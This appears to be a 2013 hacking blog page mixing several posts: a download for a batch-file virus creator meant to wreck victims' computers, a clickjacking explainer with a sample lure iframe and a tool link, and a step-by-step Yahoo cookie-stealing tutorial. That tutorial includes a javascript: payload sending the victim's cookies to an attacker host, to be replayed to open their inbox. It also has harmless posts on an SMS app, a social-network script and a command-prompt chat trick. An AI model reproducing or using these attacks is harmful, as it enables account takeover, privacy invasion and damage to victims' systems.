Saturday, 23 November 2013

Sonic Bat (The Batch file virus creator)

Sonic Bat (The Batch file virus creator)

[sonicbat.jpg] 

This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.
Click here to download

Free Sms Sending And Receiving software.

Free Sms Sending And Receiving software.

With the Help of this software you can send sms to All PAKISTAN.. Any Network.. & Prank is that #You can Read Your Receive sms...
Must Download:
CLICK ME to Download:





How To Create Your Own Social Network Website


JCOW:



Top 10 reasons to choose Jcow
1
Handle more traffic - Clean codes and Dynamic caching can lower the CPU load and
speed up your website.
2
Make your site more interactive - Well designed Jcow applications help you members to connect and communicate with others more effectively.
3
Add questions to the Registration Form - You can add new member fields, which will be displayed to the registration form, profile form, and the member browsing form.
4
Easily share stuff - Within the AJAX sharing Box, your members can publish status,
 photos, videos, and blogs.
5
Customize and Extend your Jcow Network - A Jcow network consists of core apps(like "Friends" and "Messages") and optional apps(like "Blogs" and ""Videos"). You can enable/disable optional apps. You can also develop your own apps.
6
Every profile could be Unique - Members can customize their own profile theme and
add music player to the page.
7
Members know what's happening to them - Profile was commented, photo was
 commented, forum post was replied, comment was replied,... The "Notifications"
tell everything to the member.
8
The power of "Following" - The Twitter's success tells us that people like to know the
 updates from those they are interested in.
9
Give permissions the way you want - Jcow permissions depend on "Member Roles".
 You can edit roles and give a member multiple roles. This logic enables you to members
more easily.
10
Make money from your Network - With the Ads management, you can easily insert ads
codes like Google Adsense. You can also let Jcow hide the ad to specified member roles.

Latest version: 5.2.1
Download | Demo

Admin Panel Demo

Please download Free version and install to your own server.

For More Information
www.jcow.net

Chat with Friends through Command Prompt

Chat with Friends through Command Prompt

  Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:


 
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 


8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

DONE...

What is Clickjacking

What is Clickjacking:


 

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.
when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top
level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack. 


Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in
2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.


Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they
are typing in the password to their email or bank account, but are instead typing into
an invisible frame controlled by the attacker.


At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

One famous example of clickjacking is Facebook

Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download
ClickJacking Tool


For Defence:
Clickjacking Protection

To Find The USB Logs

To Find The USB Logs

To Find The USB Logs

Go to Run Then Enter Code _|
For window 7
-->
C:\Windows\inf\setupapi.dev.log

For window Xp
-->
C:\Windows\inf\setupapi.log

___________________________________________________________________


For Ram Analysis

Open Source Tools from ForensicZone

Download Link

Cookie Hijacking

U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!..






Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47

Step:2 Download and extract files into your hard drive.
Step:3 Create a account in any ftp hosting site i suggested www.t35.com
Step4: Login to your account and upload 4 files into your ftp account.

Step5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

He would again redirected to his yahoo account.

Step6. Open the hacked.php . The password is 'hoc'.


You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password of victim account